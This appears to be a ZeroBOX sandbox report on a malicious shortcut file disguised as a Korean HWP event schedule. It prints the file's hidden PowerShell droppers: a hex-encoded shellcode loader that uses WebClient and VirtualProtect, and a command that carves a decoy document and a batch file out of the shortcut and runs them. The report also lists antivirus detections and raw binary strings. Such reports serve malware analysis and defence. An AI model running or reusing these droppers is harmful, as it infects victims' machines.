popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
GIF89a
xxxkkk]]]PPPCCC555(((
X0xT0pH
:_L3A;
{HLbF~
f:4BN~
)1QJDd
k@y+AW
Cw}W\~&K
+B-#)-
Xf;8j!Q
HWP Document File
j)%C$M
FI[[[FF
fxd@ZWWWY
HhjjJJJ
ey)))ixf
XYYY__==}k
8;+$$D
{eq1Jwzjjs
5kvmp<
{pN`w,
AKK4\H7
H4Sy m
cNVfII
YLIIIDD
'~o]pO
Q=2"|
8N===T
.&i$X6
<ohhH19
I)uAp%
2335O5Z
#%|||H
*9bwvN
_B|tyy
!BN\.)
Hr{aa!
GX-+g
D,gr$
8D2!!F
?*!-m,
D.M|oY
`srrB"
8;;KJJ
V4;6fu
Aj+A,
xnfffnn.
HoooWWW
lym-es
34;kVb>
ulD'M't
*t(=}W
]R]L` 4
IqFAF:-
?61abddda
?~LIap<s
%4`0Sx
{m^GuEC
$#(R_
#+#36>>>6f
<0:/+++'g
B4~8:B
,?tg}h
v%uuu--j
emMuia
455-,nS6
nnnnccC
j%n:},
72bbd\.
GjF`l{
2;eP#J
bhjee%&
x<hdssseee
!v3u,s
NZvi{pj
CGGG}}=8:
DKer:[
lnnnll
v8WKKKss
hsg"b5
3?QLg0
.=4C3~
z,p~}o6
q3o-$8n5
se@g:W]
pr.onV
A T SG l
_n mL Ms
!6FOtL}0
WY,N4rC
q#!jz+
1u@*S|w<
t-Y'Ow
>uw|za
e,}u5b
R=i},i
YK1G<kY
V{4cS'
~S&C(_
Er*_VK
xfY@UC
la6s4.
UA&e=(
(-=Lem:
8fo*iw
.O%z9!
lgK?KC
>yKDqU
:Lu]u"
+{ne0YG
JnLfSk
BF;C4u
ddsg$9
;y_Ey(
kC9&} .
}#ne-$
!)5:"^
eH]azd
!c%.QS
T8$"qo
W)OK7d
AbU"(<[d`qQ
fBo_i>
?]&v?-
`q{xYj
"$1\U2
;LX]<u
a%nNqVV
9.mj_6
S'/vza
GIm?~-
yaE@w/
qK]v_N
h\h|e[
8Ns=v-
<q$s_h
f:S9(?
Gn4.w.{|
kpITrme]
vNHNe/
@^igRN
nhUB]@&
.n"cg{?
tfDR]E]
;u_"YG
\;tSu
pDVC+-
]*z~Fe
E_VK|sK
?T{&ue
UM,hW}
N^+v^bh
=]1T]K
`D$Ryb-C
k|K|r;
00VHs'u
Z5JqA]
dIqxIM
PF.g8
cf}QV
ZLWV!u
/9EXY%,)
\}R|0
MJ.Q48
+6~]0}
O4ju[>_
# u]X?
o~$,/Gv
8uFJ5t'
5 nLm%u
`d2yI5
o'RWm0j
c.UZ"u
0T%}>Cl
2>?Ls
D6o<7K$[
_%2yd)e
6>td2~r*
u}Rw^re
Ou_P?Q
#=Ru0
``6k@%
I0f~ Z
T&Okd*4l
D"(($N
{#^TSk
b6JpZ
:ROi5n
HR|3_b
\.*,FS
nwDf.Wg:
K?|\\U
X,aN>e
HXx_Uqk
{'d5"G
]YCRw<[
f@3D*{
]QRwZ|y
0S\Q@W
{iCm
WdQb~si
VTZGbr
RRgsfS
D:^"o|
3,6fp2>'.
OJjI:'
zW9#PL
z[FWPG
{$~EBh
f{k{*W
DPJlz 
l&Nb K
1~Ipt0|vO
`__juh
b?<9bqW
5tK/0J
~gRh&?E
94O1ED
tB$D hl
Zv}|98
Xa]9f]
&{i'q6
IpDVBn
oUP_>W
3f}]`jv
5Nqa``
{>y`+"
:pt}vdr
V^Y7$u
Rw8]67
3$ffff
bb{,%H
4]bS?`
:x<5u
L}ipkN+]
8:7x#'
\RSs6d
&YlNdb
(OM="I
vO6SWU
wPf>HE
zS3S*S
8h4fp\
@l%1V[
-OwLvS
odQC3~
/1RKZ7
}TtrTl
BSGyE;
b^BBZIu
oyo_}.
Y3*$v8
`wLkVc
Yrp=np=
IO=qmL\cx
qNhk(0
{RM>uE
f*A_U(B
+kwVcm
H'Kt3d
q@w&'(
j$p${)!
pu65n,
=p.-Je
e{'q8"3^)
>,XxvH{
Sd+Dg@
U~;3fKp
j;_)e#
/a}"1*z
i,ko>[
blzZ)_
gt5 yt
C]V\h9
SPX`oo
f4^Lxh
a:)tZI
0p7uhp
"*EFBh
*\:]1$
p7W/s$'
bAERTu
beQh$7uty
ZgpB= .
7uT(h[F
")4wO=p
[pfcK7*
Ngwo^q
-)s$4uT
M'mDwi#
Y7sO9
$S;Cm
xh|!n
ubuY*Xl6
QNSGEsCK7
I3n8i^
,;n's%G!
!i7h0u9A{
)(m\)rx
{Y'@l/j
7-:`E4i
Krm75wM
EG'9".
QIzve]CGsk
YR6d6u
Y%gTH8S
`5vM")
'gVbKH
PBKSrSG
z`7ILK
2pL|k!a
lSG7sRF
nJuCWJV
S@zvQCgw
jzle3u$
eGWojFElr
"s?]5t
Xw).o^r
\2i`a1q
=Bdi-
8KHi>u
qwwwww
B?~J@Ux
IDATu:
HKkgPt
.8J#k/8
e?m1b"C^
([0R2RL
65w fqY
#44B>X
qbz)q(-
^xBaKG
rT|>t89
F3SGf&
cZvd6S
@mH46jj[f
:s{Gw}c[eu
(~O<ZS
L*BHrfYCS
?|d 3&
yG*Wkt
zKNyU#8
:PP\;{
L4J@XL
VPt.Y?
[:T<02Ad
Yu/Tu[G
xI_K$0
Yn1$TVS
>NF%.U
2dd3Ap
>YV#8R4
;_oP8{'
.`"`n>
^%t//<
=iSRA/
k9j+'^
Sfo7|I
j^dyUv1
k#I`|rQ
:|a@d6~
1$z+FtL
I&D$0u
@4h\J1
>dA> @
\~]CkXt
-|aSIE
Z6Q"'eJ
,?L-ie'
?)#[~\
#3uDFS"2
HN/)-o
J%<Mu7j.
c>-&u`
gy%s6;
z?t<^R
K,XDqm
2FsAC3C0
*PyPPI
xS[+Q
LjELWet
{+Eu,
iZp%mC&
GIF89a
xxxkkk]]]PPPCCC555(((
X0xT0pH
:_L3A;
{HLbF~
f:4BN~
)1QJDd
wiXRPtJk
+B-)-
6i^&]DF
=?=?=?
HWP Document File
j)%C$M
gy%s6;
z?t<^R
W2$U5B
:>##:v
<hmh5hUh>fZ
M2MeQ+
.hwp.lnkL
%windir%\SysWOW64\cmd.exe
GIF89a
xxxkkk]]]PPPCCC555(((
X0xT0pH
D'.4dw
v,H-)O
Uj<^MuLSk^i
v<q}SU+R6
HWP Document File
j)%C$M
g1=)1%pO
NsAI.(
start /min c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D22687
Root Entry
FileHeader
DocInfo
BodyText
Root Entry
FileHeader
DocInfo
BodyText
HwpSummaryInformation
BinData
PrvImage
PrvText
DocOptions
Scripts
JScriptVersion
DefaultJScript
_LinkDoc
BIN0001.png
BIN0002.png
Section0
2023-1
<>< 2023-1
2023. 5.26(
), 14:00~(
: 18:00~20:00)
1196), (1
328m, 5
TV MC)
(
Session 1:
Session 2:
Session 1:
Session 2:
Session 1:
Session 2:
: LIG
<# 1><# 2><# 3><# 4>
4:19:26
8, 0, 0, 466 WIN32LEWindows_7
: LIG
<# 1><# 2><# 3><# 4>
HwpSummaryInformation
BinData
PrvImage
PrvText
_LinkDoc
BIN0001.png
BIN0002.png
Section0
DocOptions
Scripts
JScriptVersion
DefaultJScript
2023-1
<>< 2023-1
2023. 5.26(
), 14:00~(
: 18:00~20:00)
1196), (1
328m, 5
TV MC)
(
Session 1:
Session 2:
Session 1:
Session 2:
Session 1:
Session 2:
: LIG
<# 1><# 2><# 3><# 4>
4:19:26
8, 0, 0, 466 WIN32LEWindows_7
: LIG
<# 1><# 2><# 3><# 4>
/k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = '%temp%'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.
.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 003972)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00022077 -ReadCount 00022077; $exePath = '%temp%\230511.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00018820)) -Encoding Byte; ^& $exePath;=C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe
%windir%\SysWOW64\cmd.exe
Root Entry
FileHeader
DocInfo
BodyText
Root Entry
FileHeader
DocInfo
BodyText
HwpSummaryInformation
PrvImage
PrvText
DocOptions
Section0
Scripts
JScriptVersion
DefaultJScript
_LinkDoc
23. 5.26(
),14:00~17:30
*
1196), (1
328m, 5
(14:00~14:30)
<14:00><
<14:00~14:03(03
<14:03~14:06(03
<14:06~14:09(03
<14:09~14:12(03
<14:12~14:15(03
<14:15~14:18(03
<14:18~14:27(09
<14:30><
(14:35~16:30)
(16:30~17:30)
(18:00~20:00)
6:45:36
8, 0, 0, 466 WIN32LEWindows_7
Section0
:\Users\user\AppData\Local\Temp\prv000062e010f8.gif
Section0
Antivirus Signature
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Heur.BZC.YAX.Boxter.949.978B3956
K7GW Clean
Arcabit Heur.BZC.YAX.Boxter.949.978B3956
BitDefenderTheta Clean
VirIT Clean
Cyren LNK/ABRisk.CTKX-4
Symantec Trojan.Gen.NPE
ESET-NOD32 LNK/TrojanDropper.Agent.DD
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.WinLNK.Powecod.c
Alibaba TrojanDropper:LNK/Powecod.5cdd5bcd
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Troj/LnkDrop-M
Baidu Clean
F-Secure Malware.LNK/Drop.Agent.VPVF
DrWeb Clean
VIPRE Heur.BZC.YAX.Boxter.949.978B3956
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
FireEye Heur.BZC.YAX.Boxter.949.978B3956
Emsisoft Heur.BZC.YAX.Boxter.949.978B3956 (B)
Ikarus Clean
Avast-Mobile Clean
Jiangmin Clean
Avira LNK/Drop.Agent.VPVF
MAX malware (ai score=99)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Trojan:Script/Woreflint.A!cl
ViRobot Clean
ZoneAlarm HEUR:Trojan.WinLNK.Powecod.c
GData Heur.BZC.YAX.Boxter.949.978B3956
Google Detected
AhnLab-V3 Dropper/LNK.Agent
Acronis Clean
VBA32 Trojan.Link.Crafted
ALYac Clean
TACHYON Clean
Zoner Clean
Tencent Win32.Trojan.Powecod.Kmnw
Yandex Clean
SentinelOne Static AI - Suspicious OLE
MaxSecure Clean
Fortinet Clean
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.